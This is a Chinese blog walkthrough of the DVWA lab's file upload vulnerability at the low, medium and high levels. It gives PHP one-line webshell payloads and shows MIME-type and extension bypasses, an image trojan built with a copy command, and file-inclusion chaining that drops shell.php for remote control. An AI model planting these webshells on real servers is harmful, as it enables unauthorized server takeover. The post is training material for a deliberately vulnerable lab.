文件上传漏洞--dvwa

最新推荐文章于 2024-03-16 12:00:00 发布
最新推荐文章于 2024-03-16 12:00:00 发布
阅读量477 收藏 9
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134621035
版权

low

  1. 启动dvwa 靶场在这里插入图片描述

  2. 上传一句话木马<?php @eval($_REQUEST[777]);phpinfo();?>在这里插入图片描述

  3. 上传成功,文件路径已经给出,访问一下在这里插入图片描述

  4. PHP 代码成功运行,尝试蚁剑连接连接成功在这里插入图片描述

medium

  1. 尝试上传一句话木马
    上传失败,提示只能上传JPEG、PNG格式的文件,应该是对文件的类型做了限制在这里插入图片描述

  2. 查看源代码
    此处,对文件的类型和大小做了过滤在这里插入图片描述

  3. BP抓个包
    将文件类型改为image/png提示上传成功在这里插入图片描述

  4. 访问一下在这里插入图片描述

  5. PHP 代码成功运行,尝试进行蚁剑连接
    连接成功在这里插入图片描述

high

  1. 上传一句话木马,开启BP拦截,抓取数据包在这里插入图片描述

  2. 文件上传失败,提示只能上传类型为JPEG、PNG的文件

  3. 修改文件名为1.png ,文件类型为image/png尝试上传
    上传失败在这里插入图片描述

  4. 上传一张正常的图片,查看一下文件上传功能是否正常在这里插入图片描述

  5. 上传一张正常的图片,能够上传成功,文件上传功能正常

  6. 使用命令做一张图片木马
    copy dvwa.png/b+1.php/a dvwa_1.png在这里插入图片描述

  7. 图片的末尾有一句话木马在这里插入图片描述

  8. 尝试上传图片木马
    上传成功在这里插入图片描述

  9. 虽然文件已经上传成功,但是不能getshell
    找到刚才上传图片木马的数据包在这里插入图片描述

a. 测试后缀名
将文件名改为dvwa.php
上传失败在这里插入图片描述

在将文件名改为dvwa_1.php.png 进行尝试
上传成功
说明对文件的后缀名做了过滤在这里插入图片描述

b. 00截断
将文件名改为dvwa_1.php…png
将前面的 . 给为00
上传失败在这里插入图片描述

  1. 结合文件包含漏洞来获取shell
    a. 来到文件包含模块在这里插入图片描述

b. 包含一下刚才上传的图片木马(注意地址)
包含成功
并且PHP代码已经成功运行,进行蚁剑连接在这里插入图片描述

c. 尝试进行蚁剑连接
蚁剑连不上(GG)
11. 蚁剑连接失败,但是PHP 代码可以执行。
所以尝试使用PHP 代码来生成一个shell 文件,文件内容是一句话木马,然后通过蚁剑来连接shell 文件
a. 上传一个dvwa_shell.png 的图片木马
在文件后面连接PHP 语句
意思为:在当前目录下生成一个shell 文件

<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?>

上传成功在这里插入图片描述

b. 包含一下图片木马,使图片木马里的PHP 代码能够执行在这里插入图片描述

c. 访问一下新生成的shell.php在这里插入图片描述

d. 尝试蚁剑连接
连接成功
在这里插入图片描述

DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 8658
dvwa靶场实践-低中高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1528
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传的木马 上传的木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
DVWA文件上传漏洞
dzqxwzoe的博客
02-19 1228
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
基于DVWA文件上传,包含漏洞上传一句话木马基础分析
Alexz__的博客
10-06 4791
木马 <?php @eval($_POST[value]); ?> 这是这个php程序,这个名字源于古希腊的传说这里就不说了,等于是一个别人家服务器在管理者不知情的情况下给你开了个后门你就可以在这里认真学习(放飞自我) 首先看eval函数: 在w3c里面找到的解释如下:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾...
DVWA文件上传漏洞
Feng_Blue_的博客
10-19 764
low等级 通过分析源代码,第一条只是分析上传是否为空,第二句则是文件的上传路径,第三条则是名字,可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。 如果上传成功,则会提示 路径+succesfully uploaded! 如果上传失败,则会提示 Your image was not uploaded。 我们尝试上传一个一句话木马 使用菜刀链接 菜刀可以完全访问 Medi...
文件上传漏洞详解
热门推荐
剁椒鱼头没剁椒的博客
11-28 2万+
文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。编辑器也就是在线的web编辑器,比如在搭建博客后需要发布文章,那么用来发布文章的界面就是web编辑器。
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6796
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 594
需要利用文件包含漏洞来执行php脚本,将上传图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传的文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传的文件移动到新位置,这里表示移动到指定目录。
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 551
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
DVWA文件上传
giun的博客
03-09 1318
一、尝试low等级 我们上传一个phpinfo.php文件,文件内容为&amp;lt;?php echo pphpinfo()?&amp;gt;, 把路径拼接起来,输入 http://localhost/DVWA/hackable/uploads/phpinfo.php 成功获得执行我们上次的文件 我们再上传个一句话木马文件 然后直接尝试系统命令 http://localhost/DVWA/hackabl...
【网络安全文件上传漏洞详解】
Flipped_Move的博客
01-15 1530
我自认为文件上传漏洞特点是多且杂,不像SQL注入那样成体系只要一步步往下走就行。以上文章只是对文件上传漏洞重点部分原理做了介绍与复现,此外还有大小写绕过、双写绕过,将php解析为php5等绕过方式前文中并没有提。就是说针对不同的过滤规则有不同的绕过方式,掌握原理后灵活应对即可。针对中间件的解析漏洞除了apache和IIS外还有Nginx。因为需要docker环境,笔者比较懒,并且网上有很多中间件所爆出来的漏洞的详细利用过程,因此对中间件没有过多介绍与复现。
文件上传图片
2301_80661529的博客
03-04 1858
图片马:就是在正常图片中插入木马。
文件上传漏洞-upload靶场13-16关 (图片木马-文件包含与文件上次漏洞
diaobusi的博客
09-03 992
文件包含漏洞存在于许多服务器端编程语言和框架中。这种漏洞允许攻击者通过利用应用程序未经正确验证的文件包含代码,将恶意文件或远程文件包含到目标应用程序的执行环境中。文件包含漏洞的主要原因在于应用程序在包含文件时未对用户输入进行充分的验证和过滤,或者将用户可控的输入直接用于文件路径或文件名。攻击者可以利用这个漏洞来执行恶意代码、读取敏感文件、绕过访问控制或进行其他非法操作。文件包含漏洞可以分为两种类型:本地文件包含漏洞:攻击者通过指定包含的本地文件路径,从同一服务器上读取和执行文件。
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1794
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
文件上传漏洞的利用与绕过技巧
qq_37019068的博客
10-12 3113
前言 文件上传漏洞大多出现在可以进行文件上传的地方,如用户头像上传,文档上传处等。该漏洞一个危害十分大的漏洞,通过文件上传,攻击者可以上传webshell并进行getshell操作,从而获得系统shell,可执行任意命令。也为后续大型木马的上传,特权提升提供了一个良好的基础。 文件上传漏洞的一些场景 接下来针对文件上传漏洞的一些waf过滤的场景进行说明并进行绕过和利用。 场景一:前端js代码白名单判断.jpg|.png|.gif后缀 在该场景下,防御的姿势是通过js代码对上传的文件后缀进行判断,如果不是.
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
m0_59598029的博客
03-16 827
复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。即:http://ip/hackable/uploads/10.php。可以修改php文件后缀为其他,再上传。小马:文件体积小、上传文件、文件修改、文件管理。
DVWA 文件上传通关攻略
xy_wjyjw的博客
11-16 236
在C:\Windows\System32\cmd.exe这个路径中打开cmd。点击File Upload——直接上传一句话木马(yjh.php)点击File Upload——直接上传一句话木马(yjh.php)点击上传,发现只能上传jpg或png的格式。查看图片木马,在文件的最后又一个一句话木马。将一句话木马的后缀名改为jpg,点击上传。发现解析不到木马,只能解析到图片。找到一张图片,发现可以上传成功。DVWA 文件上传通关攻略。输入上传成功图片的地址。用蚁剑连接,上传成功。用蚁剑连接,上传成功。
文件上传图片木马的学习
weixin_30907935的博客
06-03 4933
图片木马的小故事:   PHP 5.4+ 之后“%00”截断方法已经无法有效的执行了!故此图片木马非常的有意思。 图片木马:(PHP为例) 1、Copy命令制作:      图片对比: 一句话木马图片连接: 我们成功上传木马后,并不能立马的使用菜刀连接上脚本。我们需要将图片木马jpg文件改为可执行的php脚本文件。 如上图,成功的利用菜刀连接到了服务器。 ...
dvwa文件上传漏洞
最新发布
05-11
文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到控制服务器的目的。一旦攻击者上传了恶意文件,他就可以在服务器上执行任意代码,并获得服务器的权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值